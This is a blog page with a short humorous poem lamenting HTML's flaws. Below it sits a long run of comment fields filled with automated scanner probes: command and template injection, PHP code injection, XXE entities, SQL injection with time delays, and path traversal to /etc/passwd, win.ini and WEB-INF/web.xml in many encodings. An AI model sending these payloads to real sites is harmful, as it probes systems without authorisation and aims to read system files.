FHantke's Blog

html

hacking

HTML, Oh HTML: A Lament

HTML, oh HTML, how broken you are
Your syntax so convoluted, your tags so bizarre
Your semantic meaning, oh so unclear
Making it difficult to know what's held dear

Your presentation and content, they're intertwined
Making it hard to change one without the other intertwined
Your interactive elements, oh so limited
It's a struggle to create them, we're so inhibited

But still we use you, HTML, every day
Despite your flaws, you never go away
You're the foundation of the web, we can't deny
HTML, oh HTML, you'll never truly die

So here's to you, HTML, warts and all
We'll keep coding, standing tall
For better or worse, you're here to stay
HTML, oh HTML, in every way.

Feel free to follow me on Twitter and/or Mastodon

admin:

...

admin expr 933672764 + 944301521 :

...

${@var_dump(md5(305303694))};:

...

admin:

../../../../../../../../../../../../../../../../../../etc/passwd

admin:

...

admin|expr 941151747 + 840095289 :

...

/*1*/{{859811480+817729758}}:

...

admin:

...

admin:

...

'-var_dump(md5(677199876))-':

...

admin:

../../../../../../../../../../../../../../../../../../etc/passwd...

izjrdbrlrrxzvtgpenso:

...

admin:

...

admin$(expr 892039562 + 961646737):

...

${808522399+876397091}:

...

<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY content SYSTEM "http://0.0.0.0:40183/i/63ca37/x5cm/wg3s/">]><a>&content;</a>:

...

admin:

...

${820850556+812780830}:

...

admin:

...

admin:

${@var_dump(md5(653973027))};

admin:

./../../../../../../../../../../../../../../../../../../etc/passwd

admin:

izjrdbrlrrxzvtgpenso

admin:

...

admin&set /A 910243109+934813278:

...

${(964646426+926001605)?c}:

...

admin:

<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY content SYSTEM "http://0.0.0.0:40183/i/910578/gtwd/fqtw/">]><a>&content;</a>

admin:

...

admin:

${994777996+877956251}

admin:

...

admin:

'-var_dump(md5(933346427))-'

admin:

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

expr 832194037 + 985026118:

...

#set($c=826004830+824793560)${c}$c:

...

admin:

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd

admin:

...

admin:

... expr 916375776 + 854883142

<%- 905530748+943047065 %>:

...

admin:

../../../../../../etc/passwd

admin:

...|expr 952546765 + 864880073

admin:

/*1*/{{816702058+834928273}}

admin:

../../../../../../etc/passwd...

admin:

...$(expr 843471086 + 872442260)

admin:

${826888941+810142189}

admin:

./../../../../../../etc/passwd

admin:

...&set /A 852999461+969677483

admin:

${(850660257+849854698)?c}

admin:

...

admin:

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

admin:

expr 937777176 + 811460254

admin:

#set($c=936715832+934353986)${c}$c

admin:

...

admin:

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd

admin:

<%- 902851758+877437848 %>

admin:

...

admin:

/etc/passwd

admin:

...

admin:

/etc/passwd...

admin:

...

admin:

%2fetc%2fpasswd

admin'and/**/extractvalue(1,concat(char(126),md5(1698264742)))and':

...

admin:

%u2215etc%u2215passwd

admin"and/**/extractvalue(1,concat(char(126),md5(1683480978)))and":

...

admin:

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini

extractvalue(1,concat(char(126),md5(1063026962))):

...

admin:

.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini

admin'and(select'1'from/**/cast(md5(1405212524)as/**/int))>'0:

...

admin:

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini...

admin/**/and/**/cast(md5('1195379424')as/**/int)>0:

...

admin:

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1507080071'))):

...

admin:

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216windows/win%u002eini

admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1697485768')))>'0:

...

admin:

..\..\..\..\..\..\windows/win.ini

admin鎈'"\(:

...

admin:

.\..\..\..\..\..\..\windows/win.ini

admin'"\(:

...

admin'and'x'='x:

...

admin:

..\..\..\..\..\..\windows/win.ini...

admin:

...'and/**/extractvalue(1,concat(char(126),md5(1161825458)))and'

admin'and'm'='r:

...

admin:

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini

admin:

..."and/**/extractvalue(1,concat(char(126),md5(1330302412)))and"

admin"and"n"="n:

...

admin:

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216windows/win%u002eini

admin:

extractvalue(1,concat(char(126),md5(1356448683)))

admin"and"k"="a:

...

admin:

../../../../../../../../../../../../../../../../../../windows/win.ini

admin:

...'and(select'1'from/**/cast(md5(1648557429)as/**/int))>'0

admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=':

...

admin:

./../../../../../../../../../../../../../../../../../../windows/win.ini

admin:

.../**/and/**/cast(md5('1789633728')as/**/int)>0

admin'and(select*from(select+sleep(2))a/**/union/**/select+1)=':

...

admin:

../../../../../../../../../../../../../../../../../../windows/win.ini...

admin:

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1849675121')))

admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=":

...

admin:

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini

admin:

...'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1906595108')))>'0

admin"and(select*from(select+sleep(2))a/**/union/**/select+1)=":

...

admin:

...鎈'"\(

admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0:

...

admin:

../../../../../../windows/win.ini

admin:

...'"\(

admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0:

...

admin:

./../../../../../../windows/win.ini

admin'and(select+1)>0waitfor/**/delay'0:0:0:

...

admin:

../../../../../../windows/win.ini...

admin:

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini

admin'and(select+1)>0waitfor/**/delay'0:0:2:

...

admin:

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215windows%u2215win%u002eini

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('v',0)='v:

...

admin:

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',2)='t:

...

admin:

.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini

admin:

...'and'w'='w

admin:

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini...

admin:

...'and'g'='c

admin:

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini

admin:

..."and"u"="u

admin:

..."and"g"="q

admin:

..\..\..\..\..\..\windows/win.ini

admin:

...'and(select*from(select+sleep(0))a/**/union/**/select+1)='

admin:

.\..\..\..\..\..\..\windows/win.ini

admin:

...'and(select*from(select+sleep(2))a/**/union/**/select+1)='

admin:

..\..\..\..\..\..\windows/win.ini...

admin:

..."and(select*from(select+sleep(0))a/**/union/**/select+1)="

admin:

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini

admin:

..."and(select*from(select+sleep(2))a/**/union/**/select+1)="

admin:

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216windows/win%u002eini

admin:

...'/**/and(select'1'from/**/pg_sleep(0))::text>'0

admin:

../../../../../../../../../../../../../../../../../../windows/win.ini

admin:

...'/**/and(select'1'from/**/pg_sleep(2))::text>'0

admin:

./../../../../../../../../../../../../../../../../../../windows/win.ini

admin:

...'and(select+1)>0waitfor/**/delay'0:0:0

admin:

../../../../../../../../../../../../../../../../../../windows/win.ini...

admin:

...'and(select+1)>0waitfor/**/delay'0:0:2

admin:

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini

admin:

...'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g

admin:

...'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',2)='z

admin:

../../../../../../windows/win.ini

admin:

./../../../../../../windows/win.ini

admin:

../../../../../../windows/win.ini...

admin:

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini

admin:

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215windows%u2215win%u002eini

admin:

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini

admin:

.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini

admin:

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini...

admin:

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini

admin:

..\..\..\..\..\..\Windows\win.ini

admin:

.\..\..\..\..\..\..\Windows\win.ini

admin:

..\..\..\..\..\..\Windows\win.ini...

admin:

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini

admin:

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini

admin:

../../../../../../../../../../../../../../../../../../Windows/win.ini

admin:

./../../../../../../../../../../../../../../../../../../Windows/win.ini

admin:

../../../../../../../../../../../../../../../../../../Windows/win.ini...

admin:

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini

admin:

../../../../../../Windows/win.ini

admin:

./../../../../../../Windows/win.ini

admin:

../../../../../../Windows/win.ini...

admin:

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini

admin:

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini

admin:

WEB-INF/web.xml

admin:

WEB-INF/web.xml;...

admin:

../WEB-INF/web.xml

admin:

../WEB-INF/web.xml;...

admin:

../../WEB-INF/web.xml

admin:

../../WEB-INF/web.xml;...

admin:

../../../WEB-INF/web.xml

admin:

../../../WEB-INF/web.xml;...

admin:

../../../../WEB-INF/web.xml

admin:

../../../../WEB-INF/web.xml;...

../../../../../../../../../../../../../../../../../../etc/passwd:

...

../../../../../../../../../../../../../../../../../../etc/passwdadmin:

...

./../../../../../../../../../../../../../../../../../../etc/passwd:

...

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd:

...

../../../../../../etc/passwd:

...

../../../../../../etc/passwdadmin:

...

./../../../../../../etc/passwd:

...

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd:

...

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd:

...

/etc/passwd:

...

/etc/passwdadmin:

...

%2fetc%2fpasswd:

...

%u2215etc%u2215passwd:

...

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini:

...

.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini:

...

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.iniadmin:

...

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini:

...

..\..\..\..\..\..\windows/win.ini:

...

.\..\..\..\..\..\..\windows/win.ini:

...

..\..\..\..\..\..\windows/win.iniadmin:

...

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini:

...

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216windows/win%u002eini:

...

../../../../../../../../../../../../../../../../../../windows/win.ini:

...

./../../../../../../../../../../../../../../../../../../windows/win.ini:

...

../../../../../../../../../../../../../../../../../../windows/win.iniadmin:

...

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini:

...

../../../../../../windows/win.ini:

...

./../../../../../../windows/win.ini:

...

../../../../../../windows/win.iniadmin:

...

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini:

...

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215windows%u2215win%u002eini:

...

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini:

...

.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini:

...

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.iniadmin:

...

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini:

...

..\..\..\..\..\..\windows/win.ini:

...

.\..\..\..\..\..\..\windows/win.ini:

...

..\..\..\..\..\..\windows/win.iniadmin:

...

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini:

...

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216windows/win%u002eini:

...

../../../../../../../../../../../../../../../../../../windows/win.ini:

...

./../../../../../../../../../../../../../../../../../../windows/win.ini:

...

../../../../../../../../../../../../../../../../../../windows/win.iniadmin:

...

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini:

...

../../../../../../windows/win.ini:

...

./../../../../../../windows/win.ini:

...

../../../../../../windows/win.iniadmin:

...

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini:

...

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215windows%u2215win%u002eini:

...

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini:

...

.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini:

...

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin:

...

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini:

...

..\..\..\..\..\..\Windows\win.ini:

...

.\..\..\..\..\..\..\Windows\win.ini:

...

..\..\..\..\..\..\Windows\win.iniadmin:

...

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini:

...

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini:

...

../../../../../../../../../../../../../../../../../../Windows/win.ini:

...

./../../../../../../../../../../../../../../../../../../Windows/win.ini:

...

../../../../../../../../../../../../../../../../../../Windows/win.iniadmin:

...

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini:

...

../../../../../../Windows/win.ini:

...

./../../../../../../Windows/win.ini:

...

../../../../../../Windows/win.iniadmin:

...

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini:

...

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini:

...

WEB-INF/web.xml:

...

WEB-INF/web.xml;admin:

...

../WEB-INF/web.xml:

...

../WEB-INF/web.xml;admin:

...

../../WEB-INF/web.xml:

...

../../WEB-INF/web.xml;admin:

...

../../../WEB-INF/web.xml:

...

../../../WEB-INF/web.xml;admin:

...

../../../../WEB-INF/web.xml:

...

../../../../WEB-INF/web.xml;admin:

...

bro<i>bro:

bro<i>bro